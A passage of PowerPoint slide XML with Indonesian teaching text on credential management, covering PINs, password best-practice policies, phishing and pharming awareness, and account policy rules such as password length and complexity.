              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis PIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Kata Sandi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bermanfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstruksikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstruksikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperingatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing dan pharming, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>formulir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip-prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Panjang Kata Sandi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> minimum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maksimum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kata Sandi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
